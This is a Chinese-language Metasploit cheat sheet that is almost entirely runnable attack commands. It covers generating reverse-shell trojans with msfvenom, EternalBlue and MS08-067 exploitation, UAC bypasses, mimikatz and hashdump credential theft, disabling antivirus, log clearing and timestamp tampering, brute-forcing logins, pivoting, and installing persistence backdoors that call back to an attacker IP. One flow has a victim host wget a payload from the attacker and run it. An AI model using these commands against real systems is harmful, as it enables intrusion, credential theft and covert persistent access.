• MetaSploit 漏洞利用框架

1. 模块功能

   模块	功能
   Auxiliary	信息收集，漏洞扫描等辅助功能
   Payloads	漏洞验证代码
   Exploits	包含漏洞利用脚本
   Encoders	绕过检测和过滤
   Evasion	绕过杀软
   Post	Exploits 执行成功，向目标主机发送的一些功能指令
   Nops	溢出攻击

2. 目录说明

   目录	内容
   data	存放工具和用户接口代码，以及一些数据文件
   plugins	包含一些需要通过load命令加载的插件
   script	meterpreter 模块的利用脚本
   tools	包含一些有用的脚本和零散的工具

3. 基础操作流程：

   1. 确认攻击目标的IP地址 （ipconfig/ifconfig）

   2. 启动模块（msfconsole）检测模块进行搜索（search）

   3. 漏洞扫描（use 对应模块）

   4. 展示对应信息（show options）

   5. 设置相应信息（set）

   6. （run）判断是否存在漏洞 

   7. 搜索（search）并利用该漏洞 （use）

   8. 展示并设置信息（show options）并将LHOST设为本机IP或0.0.0.0（set）

   9. 利用漏洞（exploit）进行攻击

   10. 执行（run）漏洞检测工具后，前面有加号（+）代表可能存在漏洞，减号（-）则1代表不存在漏洞；

4. 生成木马流程：

   系统	命令
   Windows	msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.7.229 LPORT=4444 -f exe -o evil.exe
   Linux	msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.7.229 LPORT=5555 -f elf -o evil.elf 需管理员权限 sudo su root chmod +x evil.elf ./evil.elf
   监听	msfconsole   启动msf use exploit/multi/handler  设置监听模块 set payload windows/x64/meterpreter/reverse_tcp  设置监听的payload模块（与上面一致） set LHOST 192.168.7.229 设置msf监听地址（与上面一致） set LPORT 4444 设置监听端口（与上面一致） run 开启监听

5. stage 与 stageless 的区别

   	stage	stageless + nc 监听（攻击机启动 nc ）
   语句	msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.7.229 LPORT=4444 -f exe -o evil.exe	Windows：msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o reverse_shell.exe Linux：msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o reverse_shell.elf
   体积	较小	较大
   攻击方式	需要依赖 msfconsole 来进行操作	stageless 能够独立执行

6. Meterpreter 系统命令

   命令	描述
   background / bg	将当前会话置于后台，从Meterpreter 回退到msf框架
   bgkill [ID]	杀死后台 meterpreter 脚本
   bglist	列出正在运行的后台脚本
   execute -f [程序路径] [参数]   -i：跟进程进行交互   -f ：指定可执行程序	在目标系统上执行程序
   getuid	查看当前权限
   getsystem	尝试将权限提升到本地的系统权限
   hashdump	尝试提取目标系统密码hash
   sysinfo / run scraper	查看当前目标系统信息 / 详细信息
   shell	获取目标主机shell
   run killav	尝试关闭Windows 杀毒 （拿到shell后的第一件事）
   exit / quit	从 shell 回退到  Meterpreter
   sessions -l	查看获得的 meterpreter_shell 会话列表
   sessions ID	进入到相应的 meterpreter_shell
   sessions -k	杀死所有 sessions
   getpid	获取当前进程的pid
   migrate 指定pid	将进程注入到指定进程中
   kill 指定pid	结束指定进程
   clearev	清除日志（最后打扫战场）
   pwd / getwd	当前绝对路径（Windows / linux）
   upload 本地路径 指定路径	将文件从本地路径上传到指定路径
   download 指定路径 本地路径	将文件从指定路径下载到本地路径
   edit	编辑文件
   search ，例：search -f *.jsp -d e:\	搜索文件 ，搜索E盘中所有以.jsp为后缀的文件
   timestomp -v 指定文件	查看指定文件的时间戳
   timestomp 目标文件 指定文件	将指定文件的时间戳赋给目标文件
   portfwd add -l 本地端口 -p 目标端口 -r 目标IP	将目标IP目标端口的数据转发到本地端口
   run autoroute -s 192.168.111.0/24	添加路由到192.168.111.0/24，尝试访问
   run autoroute -p / route	查看添加的路由
   getproxy	显示当前代理配置
   load stdapi	当显示 unknown command 时，可以使用该命令尝试加载
   sessions -u id	有时候，当成功后收到 cmdshell 的话，可以执行得到sessions

• 后渗透模块（meterpreter 下执行）

 # 流程： bg - use - sessions - show options - set sessons id - run - 返回新的meterpreter - getuid（确认权限） - getsystem（提权）0 exploit/windows/local/bypassuac				# 进程注入绕过1 exploit/windows/local/bypassuac_comhijack			# COM 处理程序劫持绕过2 exploit/windows/local/bypassuac_dotnet_profiler3 exploit/windows/local/bypassuac_eventvwr			# Eventvwr 注册表项绕过4 exploit/windows/local/bypassuac_fodhelper5 exploit/windows/local/bypassuac_injection6 exploit/windows/local/bypassuac_injection_winsxs7 exploit/windows/local/bypassuac_sdclt8 exploit/windows/local/bypassuac_silentcleanup9 exploit/windows/local/bypassuac_sluihijack10 exploit/windows/local/bypassuac_vbs11 exploit/windows/local/bypassuac_windows_store_filesys12 exploit/windows/local/bypassuac_windows_store_reg

run post/windows/gather/enum_applications              		# 获取目标主机安装软件信息;
run post/windows/manage/killav                			# 关闭杀毒软件
run post/windows/manage/enable_rdp            			# 开启远程桌面服务
run post/windows/manage/autoroute              			# 查看路由信息
run post/windows/gather/checkvm                        		# 是否虚拟机
run post/windows/gather/enum_domain                     	# 查找目标主机域控.
run post/windows/gather/enum_logged_on_users    		# 列举当前登录的用户
run post/windows/gather/dumplinks                       # 获取最近的文件操作
run post/windows/gather/credentials/windows_autologin 	# 抓取自动登录的用户名和密码
run post/windows/gather/smart_hashdump               	# dump出所有用户的hash
run post/windows/gather/enum_domain 			# 查找域控
run post/windows/gather/enum_patches      		# 查看补丁信息进行提权
run post/windows/gather/enum_hostfile                   # 读取 %windir%\system32\drivers\etc\hosts

run post/linux/gather/checkvm                           	# 是否虚拟机
run post/linux/gather/enum_configs				# 查看配置信息
run post/linux/gather/enum_network				# 查看网络
run post/linux/gather/enum_protections				# 查看共享
run post/linux/gather/enum_system				# 查看系统和用户信息
run post/linux/gather/enum_users_histroy			# 查看目标主机最近的操作
run post/linux/gather/hashdump					# 获取linux的hash
run post/linux/busybox/enum_hosts                       	# 读取/var/hosts

load powershell                           			# 加载powershell功能
powershell_shell						# 获取powershell终端
Get-Acl -Path HKLM:\SAM\SAM | Format-List          		# powershell终端下执行，查看 Users 或 Everyone 是否有 SAM 注册表项的读取权限
powershell_import /root/PowerView.ps1      			# 导入powershell脚本，提前将该powershell脚本放到指定目录
powershell_execute Get-NetDomain           			# 执行该脚本下的功能模块Get-domain，该模块用于获取域信息# 一个脚本下通常有多个功能模块;获取当前用户所在域的名称;powershell_execute Invoke-UserHunter      			# 该功能模块用于定位域管理员登录的主机;
powershell_execute Get-NetForest           			# 该模块用于定位域信息
powershell_execute Invoke-EnumerateLocalAdmin 	   		 # 枚举域中所有计算机上本地管理员组的成员

run hashdump                       			# 获取用户密码 hash 值
load mimikatz / kiwi 					# 加载mimikatz
msv 							# 获取ntlm-hash值
creds_all						# 抓取明文密码
Kerberos 						# 获取票据（可能需配合使用）
ssp 							# 获取明文信息（可能包含密码，单条命令）
wdigest 						# 获取系统账户信息
mimikatz_command -f a::                                 # 通过错误查找可用模块
mimikatz_command -f hash::  				# 获取目标系统上的用户账户哈希值 （通常用于本地和域账户）
mimikatz_command -f samdump::hashes			# 从SAM中提取用户账户哈希值 （需系统或管理员权限）
mimikatz_command -f sekurlsa::searchPasswords		# 获取在Windows系统内存中的明文密码和其他敏感信息
mimikatz_command -f handle::list    			# 列出应用进程
mimikatz_command -f service::list  			# 列出服务

use sniffer			    # 加载嗅探模块（sniffer）
sniffer_interfaces                  # 查看网卡信息
sniffer_start 1                     # 开始在序号为1的网卡上抓包
sniffer_dump 1 1.cap                # 下载抓取到的数据包# 对抓取的包进行解包
# 1. 通过wireshark（图形化）
# 2. 对抓取的包进行解压（命令行）
use auxiliary/sniffer/psnuffle
set pcapfile 1.cap                 
run

流程： 
getuid 							# 查看当前用户
use incognito 						# 进入模块
list_tokens -u 						# 查看存在的令牌
impersonate_token 用户名（2个\\）			# 令牌假冒
例：用户名：WIN\test  	impersonate_token\\test		
getuid							# 查看是否成功切换身份

# 流程：use - show options - set - run ARP扫描：auxiliary/scanner/discovery/arp_sweep
TCP端口扫描：auxiliary/scanner/portscan/tcp
SYN端口扫描：auxiliary/scanner/portscan/syn 
UDP端口扫描：auxiliary/scanner/portscan/udp
SMB版本探测：auxiliary/scanner/smb/smb_version
SMB漏洞扫描：auxiliary/scanner/smb/smb_ms17_010
本地用户枚举（Windows）：auxiliary/scanner/os/windows/enum_local_users
本地服务枚举（Windows）：auxiliary/scanner/os/windows/enum_local_services
进程枚举（Windows）：auxiliary/scanner/os/windows/enum_processes
本地用户枚举（Linux）：auxiliary/scanner/unix/enum_users
本地服务枚举（Linux）：auxiliary/scanner/unix/enum_services
进程枚举（Linux）：auxiliary/scanner/unix/enum_processes
开放端口枚举：auxiliary/scanner/portscan/tcp
网络共享枚举：auxiliary/scanner/share/smb_share_enum
SNMP信息收集：auxiliary/scanner/snmp/snmp_enum

# 流程：use - show options - set - run auxiliary/scanner/mysql/mysql_login         # 爆破 mysql
auxiliary/scanner/mssql/mssql_login         # 爆破 mssql
auxiliary/scanner/ssh/ssh_login             # 爆破 SSH
auxiliary/scanner/snmp/snmp_enum            # 枚举 snmp
auxiliary/scanner/vnc/vnc_login             # 爆破 VNC
auxiliary/scanner/http/tomcat_mgr_login     # 爆破 tomcat

use exploit/windows/smb/ms08_067_netapi    	# 使用模块
set rhosts 172.16.5.27      			# 设置靶机ip
set lhost 172.16.5.28      			# 设置本地ip
set payload generic/shell_bind_tcp    		# 设置payload
run

# 扫描
use auxiliary/scanner/smb/smb_ms17_010             	# 扫描是否存在该漏洞
set rhosts 10.10.10.14    				#设置目标主机的IP,也可以设置整个IP段
set threads 10
run# 利用
use exploit/windows/smb/ms17_010_eternalblue    	# 漏洞利用
set rhosts 10.10.10.14                          	# 设置目标主机的IP,也可以设置整个IP段
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.10.147
set lport 4444
run# or
use exploit/windows/smb/ms17_010_psexec    		# 漏洞利用
set payload windows/meterpreter/bind_tcp
set rhost 192.168.33.33
run# or
use auxiliary/admin/smb/ms17_010_command    		# 漏洞利用
set rhosts=192.168.26.33.33
set COMMAND net user hack  hack123 /add
set COMMAND net localgroup administrators hack  /add
run

• MSF 渗透流程

# 生成Linux 木马 
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.7.229 LPORT=9999 -f elf -o shell.elf # 启动msf 
msfconsole # 启动监听 
use exploit/multi/handler # 查看需要设置的内容 
show options # 设置参数 
set payload linux/x64/meterpreter/reverse_tcp 
set LHOST 192.168.7.229 
set LPORT 9999# 运行 
run # kali 另开窗口，启动http服务（注意服务启动位置） 
python -m http.server # 需提权的主机，下载木马 
wget http://192.168.7.229:8000/shell.elf # 赋予执行权限，运行 
chmod +x shell.elf 
./shell.elf # 寻找可提权的nday后执行 
run post/multi/recon/local_exploit_suggester # 将当前命令环境置于后台
bg# 使用前面的提权exp执行 
use exploit/linux/local/cve_2022_0847_dirtypipe 
show options# 查看并选择sessions
# 查看：sessions
# 选择：set session ID# 提权成功，可以以高权限用户身份执行命令
shell# 执行后可能没回显，但能以root身份执行系统命令
例：whoami# 添加路由
run post/multi/manage/autoroute#查看路由信息
run autoroute -p# 设置代理 （默认为 socks5代理 127.0.0.1 的 1080 端口）
run auxiliary/server/socks_proxy# 回车 ,exit,进行主机存活扫描
use auxiliary/scanner/portscan/tcp
set PORTS 21,22,23,80,443,8080,3389,445
set RHOSTS 10.0.20.0/24
run# 设置代理成功，可以通过输入对应IP和端口实现代理了
# 例：kali编辑proxychains
vim /etc/proxychains.conf
# 写入 （默认1080）
socks5 设置的代理IP 1080     # 亦或是 将代理服务器的IP设为vps公网ip，在本机进行访问
show options
set SRVHOST 公网IP
set SRVPORT 公网端口# 其他 
# 后门（metsvc）（meterpreter下运行）
run metsvc  		# 安装后门（服务名：metsvc，默认端口：31337，路径：C:\Windows\TEMP\目录下新建随机名称的文件夹）# 可选参数：-A ：启动后门后，exploit/multi/handler模块自动连接后门     -r：删除后门# 例：run metsvc -A # 手动连接后门（msf下运行）
set payload windows/metsvc_bind_tcp
# 设置ip和端口后，run# 后门（persistence）（meterpreter下运行）
# -X 系统启动时运行  -i 每隔多少秒重连 -r 攻击者ip  -p 攻击者监听端口
run persistence -X -i 10 -r 192.168.7.229 -p 4444     # 生成后门 # 手动连接后门（msf下运行）
set payload windows/meterpreter/reverse_tcp
# 设置ip和端口后，run

• 其他

# centos 一键安装MSF 命令
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall# 设置软链接
ln -s /opt/metasploit-framework/bin/msfconsole /usr/bin/msfconsole# 卸载Postgresql数据库
yum remove postgresql# 查看是否卸载完成
rpm -qa | grep postgresql # 导入yum源
yum install -y https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm# 安装Postgresql数据库客户端与服务端，这里的12是版本，如果是9.5，那么就是95
yum install -y postgresql12 postgresql12-server # 查询是否安装成功
rpm -qa | grep postgresql# 初始化数据库
/usr/pgsql-12/bin/postgresql-12-setup initdb# 启动服务
systemctl start postgresql-12 
# 设置开机自启
systemctl enable postgresql-12MSF 使用参考链接：https://blog.csdn.net/weixin_45588247/article/details/119614618